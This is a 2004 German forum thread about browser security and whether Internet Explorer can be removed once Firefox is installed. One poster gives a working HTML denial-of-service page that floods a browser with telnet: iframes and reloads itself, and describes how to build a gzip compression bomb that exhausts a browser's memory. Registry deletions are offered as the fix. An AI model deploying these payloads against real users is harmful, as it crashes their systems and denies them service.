[xxfaxexx]

Und was ist da nun am besten bzw. am sichersten?

Cui Faxe

[Stulle]

Zitat (Kuja: 01.07.2004, 00:46)

Zitat (Stulle: 01.07.2004, 00:38)

Faxe

Wenn Du ihn nicht benutzt, gibt es auch keine Sicherheitslücken die ausgenutzt werden können.

Das stimmt so nicht, es gibt auch Sicherheitslücken die ohne den IE ausgenutzt werden können.

Es war vom Internet Explorer die Rede. Nur die dort enthaltenen Sicherheitslücken meinte ich.


Natürlich hast Du sonst recht kuja

[Dawn]

Am sichersten ist nix jede Software hat sicherheitslücken nur werden die bei Firefox und co nicht ausgenutzt da die merhheit immernoch mit dem ie unterwegs ist. Es gibt eigentlich nur eins was man machen kann die jeweilige Software immer auf dem aktuellsten stand zu halten.

Dieser Beitrag wurde von GeForceFX User bearbeitet: 30. Juni 2004 - 23:54

[xxfaxexx]

Zitat (GeForceFX User: 01.07.2004, 00:54)

Am sichersten ist nix jede Software hat sicherheitslücken nur werden die bei Firefox und co nicht ausgenutzt da die merhheit immernoch mit dem ie unterwegs ist. Es gibt eigentlich nur eins was man machen kann die jeweilige Software immer auf dem aktuellsten stand zu halten.

Moin,

das ist mir schon klar/bekannt! Aber wenn ich den i-Explorer drauf habe und nicht benutze dann ´brauche ich ihn doch auch nicht. Es gibt doch auch bestimmt die Möglichkeit, das mir dann nen Hacker oder so von ausen den I-Explorer startet und mich somit hackt oder so. Oder ist das nicht möglich?

Cui Faxe

[Rika]

Es gibt sehr wohl eine Lücke in Windows, die sich auf alle Browser überträgt.
Nur im IE lässt sich diese auch noch zu anderen Sachen als DoS ausnutzen.
Die Lösung ist trivial und schon im dingens-Tool enthalten.

Zitat

[-HKEY_CLASSES_ROOT\AIM]
[-HKEY_CLASSES_ROOT\gopher]
[-HKEY_CLASSES_ROOT\telnet]

Naja, und natürlich GZIP-Bombs.

[xxfaxexx]

Zitat (Rika: 01.07.2004, 01:18)

Die Lösung ist trivial und schon im dingens-Tool enthalten.

Zitat

[-HKEY_CLASSES_ROOT\AIM]
[-HKEY_CLASSES_ROOT\gopher]
[-HKEY_CLASSES_ROOT\telnet]

Naja, und natürlich GZIP-Bombs.

Moin,

kannste das bitte mal genauer erklären?
Und was meinst du dazu @Rika:
Wenn ich Firefox Installiert habe kann ich doch den i-Exploerer Komplett entfernen ohne das dieses Probs verursachen dürfte oder?

Cui Faxe

[Dawn]

Den IE komplett zu Entfernen ist nicht ratsam da er fest im System integriert ist und auch vieles auf dem IE aufbaut.

[xxfaxexx]

Moin,

OK danke dann werde ich ihn drinne lassen .

Cui Faxe

[ZakMcKracken]

Es wäre was feines, wenn man den IE rausschmeißen könnte.

Aber leider programmieren viele Webdesigner nur nach IE und nich nach alternativen Browsern, so dass ich div. Seite nicht im Firefox oder ähnlichen anzeigen lassen...

[Rika]

@xxfakexx:

<html><body>
<meta http-equiv="reload" content="5;index.html">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<iframe src="telnet:blahsuelzlaber.org">
<script language="JavaScript">
docuemnt.setTimeout("document.refresh(document.location)");
</script></body></html>

Oder wie's ein Mitglied scho mal schrieb: "Hey, kann mir mal einer sagen, warum Opera brav den Telnet-Explot ausführt?"
Mozilla/Firefox ist dementsprechend auch betroffen.

Abhilfe schafft das Löschen des URL-Handlers. Und weil das AIM-Protokoll schon seit jeher als kaputt bekannt ist und das gopher-Protokoll nix mehr taugt bzw. wie sich beim IE zeigte gar noch eine Sicherhietslücke darstellen kann, haut man diese am besten auch noch gleich mit raus.


Das andere ist eine typische Kompressionsbombe. Du packst eine HTML-Datei mit 10 Mrd. gleichen Zeichen voll, gzipst sie und packst sie auf einen entsprechenden Server, der HTTP 1.1 unterstützt. So, wenn jetzt jemand die Seite abruft, dann fordert der Browser die komprimierte Version an, der Server übertägt die komprimierte Version, der Browser entpackt sie und entpackt sich dabei dumm und dämlich. Speicher voll, swappt nur noch, Browser praktisch tot. Einen passenden Patch dagegen habe ich schon längst eingereicht, sollte dann hoffentlich im Firefox 1.0 drin sein.

[xxfaxexx]

Moin,

Zitat

@Rika

Abhilfe schafft das Löschen des URL-Handlers.

Und wie löscht man diesen? Hat es auch negative seiten oder wir das nicht benötgt?

Cui Faxe

[Rika]

1. Ich hab die zu löschenden Registry-Schlüssel sowie das Tool, in dem sie ebenfalls gehlöscht werden, bereits erwähnt.
2. Ja. Du kannst mit dem originalen AIM-Client keine aim:-Links mehr anklicken, und wenn du es gewähnt warst, über Start, Ausführen, telnet:host.com deine Telnet-Sessions zu starten, dann wird auch das nicht mehr gehen.
3. Ja, wenn man mal recht darüber nachdenkt, wird es einfach nicht benötigt. Taugt offenbar nur für DoS oder im Falle der AIM-Links sogar für Einschleusen von Code.

[xxfaxexx]

Moin,

@Rika:

habe das Original-Tool davon ausgeführt. Habe gerade geschaut und habe von den drei Schlüsseln nur noch den [-HKEY_CLASSES_ROOT\telnet]. Dieser dürfte aber doch eigentlich auch nicht mehr da sein oder Täusche ich mich da?

Cui Faxe

[Meltdown]

Es kommt noch wirklich so weit. Irgendwann ist hier der Zweit-Rechner bei mir - und zwar nur fürs Surfen.

Vor was müßte man dann eigentlich noch Angst haben ? Dialern ?

Hätte sich mit DSL dann auch erledigt.

Malware-Coder, Spammer & Dialer-Verbreiter - irgendwann graben die sich mal selbst das Wasser mit diesem ganzen Müll ab..

Erst recht wenn man bedenkt, das die Fehler in den Betriebssystemen sich nicht
völlig ausmerzen lassen werden.

Wenn das so weiter geht, werde ich den Online-Bereich in den nächsten Jahren auf das
notwendige Minimum beschränken.

Man ist auf Windows-Systemen momentan mehr mit der Systemabdichtung als mit Arbeiten beschäftigt.

Nee. Dann lieber offline...

Das Netz ist ja sowas von voll mit dem Zeug. Irgendwann ist dann auch bei mir
die Schmerzgrenze erreicht.

Ist doch wahr...

[sensi]

Einen schönen Tag allen ...